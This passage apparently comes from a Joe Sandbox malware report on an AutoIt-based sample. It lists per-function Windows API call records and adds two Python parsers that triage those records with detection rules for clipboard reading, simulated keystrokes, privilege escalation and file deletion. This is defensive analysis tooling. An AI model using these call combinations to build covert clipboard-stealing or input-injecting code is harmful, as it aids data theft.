                                                                                • Instruction Fuzzy Hash: FEE0BF7594010D9FDB00EFA8D54969E7BB4EF04301F104165FD0592281D6309D508A62
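The two Sleep records above come from a dump at 01007000 marked "based on PE: false", i.e. code that was not mapped from the image on disk, and the argument 000001F4 is 500 ms. Picking such records out of a long IDA Plugin listing by hand is tedious, so here is an added example (not part of the Joe Sandbox report or its tooling) that parses records in exactly the layout used on this page, separates functions recovered from non-image-backed memory from those in the PE, and decodes the Sleep delays. The SAMPLE text is a constructed excerpt reproducing the LoadLibraryExW and Sleep records above; the function and field names are this example's own.

```python
"""Parse Joe Sandbox 'IDA Plugin' function records (the layout shown in this
report) and pull out the ones a triager looks at first: functions recovered
from memory that is NOT backed by the PE image on disk.

Added example, not Joe Sandbox code.  SAMPLE is a constructed excerpt in the
same layout as the records on this page; one record ends at its
'Instruction Fuzzy Hash' line.
"""
import re
from dataclasses import dataclass, field

SAMPLE = """\
APIs
• Part of subcall function 003B4214: FreeLibrary.KERNEL32(00000000,?), ref: 003B4247
• LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,003B39FE,?,00000001), ref: 003B41DB
Memory Dump Source
• Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
Similarity
• API ID: Library$Free$Load
• String ID:
• API String ID: 2391024519-0
• Instruction Fuzzy Hash: 5F11EB31700315BADB16AB70DC06FEE77A99F40704F104829F656AE5C2DB74DA00AB68
APIs
• Sleep.KERNELBASE(000001F4), ref: 010097A1
Memory Dump Source
• Source File: 00000000.00000002.1445160018.0000000001007000.00000040.00000020.00020000.00000000.sdmp, Offset: 01007000, based on PE: false
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Instruction Fuzzy Hash: 7AE0BF7594010DEFDB01EFA8D5496DE7BB4FF04301F1045A5FD05D7681DB309E548A62
"""

# One API reference: "<name>.<MODULE>(<args>), ref: <addr>".  The argument
# list and the comma are optional ("SendMessageW.USER32 ref: 0041F966").
API_RE = re.compile(
    r"(?P<name>[A-Za-z_][A-Za-z_0-9]*)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)"
)
SOURCE_RE = re.compile(
    r"Source File:\s+(?P<file>\S+),\s+Offset:\s+(?P<offset>[0-9A-Fa-f]+),"
    r"\s+based on PE:\s+(?P<pe>true|false)"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: int
    via_subcall: bool  # True for "Part of subcall function ..." lines


@dataclass
class FuncRecord:
    calls: list = field(default_factory=list)
    source_file: str = ""
    offset: int = 0
    based_on_pe: bool = False
    fields: dict = field(default_factory=dict)  # "API ID", "Opcode ID", ...


def parse_records(text):
    """Split report text into one FuncRecord per function."""
    records, cur = [], FuncRecord()
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        m = SOURCE_RE.search(line)
        if m:
            cur.source_file = m["file"]
            cur.offset = int(m["offset"], 16)
            cur.based_on_pe = m["pe"] == "true"
            continue
        m = API_RE.search(line)
        if m:
            args = [a for a in (m["args"] or "").split(",") if a]
            cur.calls.append(ApiCall(m["name"], m["module"], args,
                                     int(m["ref"], 16),
                                     line.startswith("Part of subcall")))
            continue
        if ":" in line:  # generic "Key: value" bullet
            key, _, val = line.partition(":")
            cur.fields[key.strip()] = val.strip()
            if key.strip() == "Instruction Fuzzy Hash":  # closes a record
                records.append(cur)
                cur = FuncRecord()
    return records


def unbacked_functions(records):
    """Functions whose dump is not backed by the PE image: code that exists
    only in memory (unpacked or injected stages)."""
    return [r for r in records if not r.based_on_pe]


def api_histogram(records):
    """Count direct (non-subcall) API references across all records."""
    counts = {}
    for r in records:
        for c in r.calls:
            if not c.via_subcall:
                key = f"{c.name}.{c.module}"
                counts[key] = counts.get(key, 0) + 1
    return counts


def sleep_ms(record):
    """Decode the millisecond argument of every resolvable Sleep() call."""
    return [int(c.args[0], 16) for c in record.calls
            if c.name == "Sleep" and c.args and c.args[0] != "?"]


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for r in unbacked_functions(recs):
        print(f"{r.offset:08X} {r.fields.get('API ID')} sleeps_ms={sleep_ms(r)}")
```

Run it against the full text of this section rather than SAMPLE and the output is the list of functions living in the 01007000 region, which is where the unpacked stage's API usage (here the 500 ms Sleep loop) shows up, separated from the AutoIt interpreter's own code at 003B0000.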
                                                                                APIs
                                                                                  • Part of subcall function 003CB34E: GetWindowLongW.USER32(?,000000EB), ref: 003CB35F
                                                                                • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 0041F87D
                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0041F8DC
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0041F919
                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0041F940
                                                                                • SendMessageW.USER32 ref: 0041F966
                                                                                • _wcsncpy.LIBCMT ref: 0041F9D2
                                                                                • GetKeyState.USER32(00000011), ref: 0041F9F3
                                                                                • GetKeyState.USER32(00000009), ref: 0041FA00
                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0041FA16
                                                                                • GetKeyState.USER32(00000010), ref: 0041FA20
                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0041FA4F
                                                                                • SendMessageW.USER32 ref: 0041FA72
                                                                                • SendMessageW.USER32(?,00001030,?,0041E059), ref: 0041FB6F
                                                                                • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 0041FB85
                                                                                • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0041FB96
                                                                                • SetCapture.USER32(?), ref: 0041FB9F
                                                                                • ClientToScreen.USER32(?,?), ref: 0041FC03
                                                                                • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0041FC0F
                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0041FC29
                                                                                • ReleaseCapture.USER32 ref: 0041FC34
                                                                                • GetCursorPos.USER32(?), ref: 0041FC69
                                                                                • ScreenToClient.USER32(?,?), ref: 0041FC76
                                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 0041FCD8
                                                                                • SendMessageW.USER32 ref: 0041FD02
                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0041FD41
                                                                                • SendMessageW.USER32 ref: 0041FD6C
                                                                                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0041FD84
                                                                                • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0041FD8F
                                                                                • GetCursorPos.USER32(?), ref: 0041FDB0
                                                                                • ScreenToClient.USER32(?,?), ref: 0041FDBD
                                                                                • GetParent.USER32(?), ref: 0041FDD9
                                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 0041FE3F
                                                                                • SendMessageW.USER32 ref: 0041FE6F
                                                                                • ClientToScreen.USER32(?,?), ref: 0041FEC5
                                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0041FEF1
                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0041FF19
                                                                                • SendMessageW.USER32 ref: 0041FF3C
                                                                                • ClientToScreen.USER32(?,?), ref: 0041FF86
                                                                                • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0041FFB6
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0042004B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                • String ID: @GUI_DRAGID$F
                                                                                • API String ID: 2516578528-4164748364
                                                                                • Opcode ID: a6e0dda4a3f2bf08b44d49d4e1b86703bd020ad9e45ea4d722c2db3bb88378ea
                                                                                • Instruction ID: 48d99a67f1067042350dc37afabe2ddb834c4b453bd33aa741be4649cd50634f
                                                                                • Opcode Fuzzy Hash: a6e0dda4a3f2bf08b44d49d4e1b86703bd020ad9e45ea4d722c2db3bb88378ea
                                                                                • Instruction Fuzzy Hash: 7532DD74604744EFDB10DF28C884BAABBA4FF49354F14062AF699872B1C734DC9ACB59
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0041B1CD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID: %d/%02d/%02d
                                                                                • API String ID: 3850602802-328681919
                                                                                • Opcode ID: f15491df6d7a48c55a29147b0f409ed6f26725c4b4d93a6a090b9679a719c491
                                                                                • Instruction ID: 26d0693ca361f0d76a39fef4b713a1cce811e9c9857141db5e83465a0a87bcfa
                                                                                • Opcode Fuzzy Hash: f15491df6d7a48c55a29147b0f409ed6f26725c4b4d93a6a090b9679a719c491
                                                                                • Instruction Fuzzy Hash: 3F12CE71600208ABEB258F64DC49FEB7BB8FF45710F10412AF919DB2D1DB788982CB59
                                                                                APIs
                                                                                • GetForegroundWindow.USER32(00000000,00000000), ref: 003CEB4A
                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00423AEA
                                                                                • IsIconic.USER32(000000FF), ref: 00423AF3
                                                                                • ShowWindow.USER32(000000FF,00000009), ref: 00423B00
                                                                                • SetForegroundWindow.USER32(000000FF), ref: 00423B0A
                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00423B20
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00423B27
                                                                                • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00423B33
                                                                                • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00423B44
                                                                                • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00423B4C
                                                                                • AttachThreadInput.USER32(00000000,?,00000001), ref: 00423B54
                                                                                • SetForegroundWindow.USER32(000000FF), ref: 00423B57
                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00423B6C
                                                                                • keybd_event.USER32(00000012,00000000), ref: 00423B77
                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00423B81
                                                                                • keybd_event.USER32(00000012,00000000), ref: 00423B86
                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00423B8F
                                                                                • keybd_event.USER32(00000012,00000000), ref: 00423B94
                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00423B9E
                                                                                • keybd_event.USER32(00000012,00000000), ref: 00423BA3
                                                                                • SetForegroundWindow.USER32(000000FF), ref: 00423BA6
                                                                                • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00423BCD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                • String ID: Shell_TrayWnd
                                                                                • API String ID: 4125248594-2988720461
                                                                                • Opcode ID: 843cdc42c5fef60463ca1f0f800077b124ed45b89e99fd4d4e252a7e8f519838
                                                                                • Instruction ID: 8a51d7a6b0fa4fad6798e592097ae6dccece9f59330bb7682442bf98e0256c04
                                                                                • Opcode Fuzzy Hash: 843cdc42c5fef60463ca1f0f800077b124ed45b89e99fd4d4e252a7e8f519838
                                                                                • Instruction Fuzzy Hash: 0431A371F402287BEB205F75AC4AF7F3E7CEB44B50F104026FA05EA1D1D6B46D01AAA8
                                                                                APIs
                                                                                  • Part of subcall function 003EB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003EB180
                                                                                  • Part of subcall function 003EB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 003EB1AD
                                                                                  • Part of subcall function 003EB134: GetLastError.KERNEL32 ref: 003EB1BA
                                                                                • _memset.LIBCMT ref: 003EAD08
                                                                                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 003EAD5A
                                                                                • CloseHandle.KERNEL32(?), ref: 003EAD6B
                                                                                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 003EAD82
                                                                                • GetProcessWindowStation.USER32 ref: 003EAD9B
                                                                                • SetProcessWindowStation.USER32(00000000), ref: 003EADA5
                                                                                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 003EADBF
                                                                                  • Part of subcall function 003EAB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,003EACC0), ref: 003EAB99
                                                                                  • Part of subcall function 003EAB84: CloseHandle.KERNEL32(?,?,003EACC0), ref: 003EABAB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                • String ID: $H*F$default$winsta0
                                                                                • API String ID: 2063423040-2846944928
                                                                                • Opcode ID: f58ffdf10e522a31d5843191078f90cba2b2ecfa1fdbc5ea2cca69749d08fd6c
                                                                                • Instruction ID: f06c72c29eb57d65e21c5c2b2625953bf949df03cc12e8cd04656a8e641aec15
                                                                                • Opcode Fuzzy Hash: f58ffdf10e522a31d5843191078f90cba2b2ecfa1fdbc5ea2cca69749d08fd6c
                                                                                • Instruction Fuzzy Hash: CD81CE71800699AFDF12DFA5DC49AEEBBB8FF04344F044229F810B61A1D771AE45DB61
                                                                                APIs
                                                                                  • Part of subcall function 003F6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,003F5FA6,?), ref: 003F6ED8
                                                                                  • Part of subcall function 003F6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,003F5FA6,?), ref: 003F6EF1
                                                                                  • Part of subcall function 003F725E: __wsplitpath.LIBCMT ref: 003F727B
                                                                                  • Part of subcall function 003F725E: __wsplitpath.LIBCMT ref: 003F728E
                                                                                  • Part of subcall function 003F72CB: GetFileAttributesW.KERNEL32(?,003F6019), ref: 003F72CC
                                                                                • _wcscat.LIBCMT ref: 003F6149
                                                                                • _wcscat.LIBCMT ref: 003F6167
                                                                                • __wsplitpath.LIBCMT ref: 003F618E
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 003F61A4
                                                                                • _wcscpy.LIBCMT ref: 003F6209
                                                                                • _wcscat.LIBCMT ref: 003F621C
                                                                                • _wcscat.LIBCMT ref: 003F622F
                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 003F625D
                                                                                • DeleteFileW.KERNEL32(?), ref: 003F626E
                                                                                • MoveFileW.KERNEL32(?,?), ref: 003F6289
                                                                                • MoveFileW.KERNEL32(?,?), ref: 003F6298
                                                                                • CopyFileW.KERNEL32(?,?,00000000), ref: 003F62AD
                                                                                • DeleteFileW.KERNEL32(?), ref: 003F62BE
                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 003F62E1
                                                                                • FindClose.KERNEL32(00000000), ref: 003F62FD
                                                                                • FindClose.KERNEL32(00000000), ref: 003F630B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                                                • String ID: \*.*$p1Wu`KXu
                                                                                • API String ID: 1917200108-2866000061
                                                                                • Opcode ID: d83baea7e59b1571987d49b84b204832ab912755f61ac368c9d96a8445a7a009
                                                                                • Instruction ID: 523ebd74b78989bcf5e9167974c3d99b29f95092071936dc5c3d3fc165dc248f
                                                                                • Opcode Fuzzy Hash: d83baea7e59b1571987d49b84b204832ab912755f61ac368c9d96a8445a7a009
                                                                                • Instruction Fuzzy Hash: AC511E72D0811C6ACB22EBA1DC45DEF77BCAF05300F0905EAE685E7141DB3697498FA4
                                                                                APIs
                                                                                • OpenClipboard.USER32(0044DC00), ref: 00406B36
                                                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 00406B44
                                                                                • GetClipboardData.USER32(0000000D), ref: 00406B4C
                                                                                • CloseClipboard.USER32 ref: 00406B58
                                                                                • GlobalLock.KERNEL32(00000000), ref: 00406B74
                                                                                • CloseClipboard.USER32 ref: 00406B7E
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00406B93
                                                                                • IsClipboardFormatAvailable.USER32(00000001), ref: 00406BA0
                                                                                • GetClipboardData.USER32(00000001), ref: 00406BA8
                                                                                • GlobalLock.KERNEL32(00000000), ref: 00406BB5
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00406BE9
                                                                                • CloseClipboard.USER32 ref: 00406CF6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                • String ID:
                                                                                • API String ID: 3222323430-0
                                                                                • Opcode ID: 369f53569877ea0fc63863d843867163f50fb3a800b0fa08c129416c62da6024
                                                                                • Instruction ID: 480cf9bedbbd04d6956683308a87fb083aad7e53abe974dc98eb677ce74a51b9
                                                                                • Opcode Fuzzy Hash: 369f53569877ea0fc63863d843867163f50fb3a800b0fa08c129416c62da6024
                                                                                • Instruction Fuzzy Hash: A7519E71604201ABD311EF65DD46FAF77B8AF84B00F01103AF657E62D1DF74E9058A6A
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 003FF62B
                                                                                • FindClose.KERNEL32(00000000), ref: 003FF67F
                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 003FF6A4
                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 003FF6BB
                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 003FF6E2
                                                                                • __swprintf.LIBCMT ref: 003FF72E
                                                                                • __swprintf.LIBCMT ref: 003FF767
                                                                                • __swprintf.LIBCMT ref: 003FF7BB
                                                                                  • Part of subcall function 003D172B: __woutput_l.LIBCMT ref: 003D1784
                                                                                • __swprintf.LIBCMT ref: 003FF809
                                                                                • __swprintf.LIBCMT ref: 003FF858
                                                                                • __swprintf.LIBCMT ref: 003FF8A7
                                                                                • __swprintf.LIBCMT ref: 003FF8F6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                                                • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                • API String ID: 835046349-2428617273
                                                                                • Opcode ID: e881e2cd720bc102fa1eb3c660f4cfd4391ee43d87677d5340a9212ab99a0392
                                                                                • Instruction ID: e664faf3c0a8c9e30bce2fa54a15074ce22dc10f9115e15b396252951cc08345
                                                                                • Opcode Fuzzy Hash: e881e2cd720bc102fa1eb3c660f4cfd4391ee43d87677d5340a9212ab99a0392
                                                                                • Instruction Fuzzy Hash: 7FA111B2508344AFC311EB94C885EAFB7ECAF94704F440D2EF695C6151EB34DA49C762
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 00401B50
                                                                                • _wcscmp.LIBCMT ref: 00401B65
                                                                                • _wcscmp.LIBCMT ref: 00401B7C
                                                                                • GetFileAttributesW.KERNEL32(?), ref: 00401B8E
                                                                                • SetFileAttributesW.KERNEL32(?,?), ref: 00401BA8
                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00401BC0
                                                                                • FindClose.KERNEL32(00000000), ref: 00401BCB
                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00401BE7
                                                                                • _wcscmp.LIBCMT ref: 00401C0E
                                                                                • _wcscmp.LIBCMT ref: 00401C25
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00401C37
                                                                                • SetCurrentDirectoryW.KERNEL32(004639FC), ref: 00401C55
                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00401C5F
                                                                                • FindClose.KERNEL32(00000000), ref: 00401C6C
                                                                                • FindClose.KERNEL32(00000000), ref: 00401C7C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                • String ID: *.*
                                                                                • API String ID: 1803514871-438819550
                                                                                • Opcode ID: 35aa8576c3bc22e4d5fd7ff52748c958c2b6c4ce0b5b700e132978a7aa840462
                                                                                • Instruction ID: 6ee59fef7a3bbd44c014713f7c0c921800d9b5a0b9fbfd7d273f7a7dc0bc3944
                                                                                • Opcode Fuzzy Hash: 35aa8576c3bc22e4d5fd7ff52748c958c2b6c4ce0b5b700e132978a7aa840462
                                                                                • Instruction Fuzzy Hash: 9F3193329442196BDF14AFB0EC49ADF77AC9F05324F1041B7F911E21E0EB78DA858A6C
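A small triage parser for the per-function "APIs" records listed above, added here as an example; it is not part of the Joe Sandbox report or of its IDA plugin. It reads records in the report's own format, keeps the "Part of subcall function" attribution on each call, and fires on API combinations that appear in the records on this page: the clipboard read (OpenClipboard / GetClipboardData / GlobalLock), the AttachThreadInput / SetForegroundWindow / keybd_event foreground takeover, the AdjustTokenPrivileges plus OpenWindowStationW / OpenDesktopW sequence, and the FindFirstFileW / MoveFileW / DeleteFileW walk. The rule table, rule names and the labels are assumptions of this example and describe only what a call combination is consistent with, not confirmed behaviour of the sample; the embedded text is a constructed excerpt of three records from this page.

```python
"""Triage Joe Sandbox 'APIs' records (added example; not Joe Sandbox's own tooling)."""
import re
from dataclasses import dataclass, field

# One API call line as the report prints it: "• Name.MODULE(args), ref: ADDR",
# optionally prefixed with "Part of subcall function XXXXXXXX:" for calls the
# plugin attributes to a callee of the function being described.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?.*?\bref:\s*(?P<ref>[0-9A-F]{8})"
)
# Any other bullet ("• String ID: ...", "• Source File: ...") is kept as metadata.
FIELD_LINE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")

# Hypothetical rule table (an assumption of this example): every API in the set
# must occur in one function record for the rule to fire. The labels say what
# the combination is consistent with, not what the sample was confirmed to do.
RULES = {
    "clipboard-read": frozenset({"OpenClipboard", "GetClipboardData", "GlobalLock"}),
    "forced-foreground": frozenset(
        {"AttachThreadInput", "SetForegroundWindow", "keybd_event"}),
    "token-privilege-desktop": frozenset(
        {"AdjustTokenPrivileges", "OpenWindowStationW", "OpenDesktopW"}),
    "file-walk-move-delete": frozenset({"FindFirstFileW", "MoveFileW", "DeleteFileW"}),
}


@dataclass
class Record:
    calls: list = field(default_factory=list)  # (api, module, ref, from_subcall)
    meta: dict = field(default_factory=dict)   # "String ID", "API ID", ...

    def apis(self, include_subcalls=True):
        return {a for a, _, _, sub in self.calls if include_subcalls or not sub}


def parse_records(text):
    """Split report text into one Record per 'APIs' header."""
    records, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = Record()
            records.append(cur)
            continue
        if cur is None:
            continue
        m = API_LINE.match(line)
        if m:
            cur.calls.append((m["api"], m["mod"], m["ref"], m["sub"] is not None))
            continue
        f = FIELD_LINE.match(line)
        if f:
            cur.meta[f["key"].strip()] = f["val"].strip()
    return records


def api_sequence(rec):
    """Direct calls of the function, in the order the report lists them."""
    return [a for a, _, _, sub in rec.calls if not sub]


def triage(records):
    """Return (record index, rule name, String ID) for every rule that fires."""
    hits = []
    for i, rec in enumerate(records):
        present = rec.apis()  # subcall APIs count: the report attributes them here
        for name, needed in RULES.items():
            if needed <= present:
                hits.append((i, name, rec.meta.get("String ID", "")))
    return hits


# Constructed excerpt in the report's own format (three records from this page).
SAMPLE = """\
APIs
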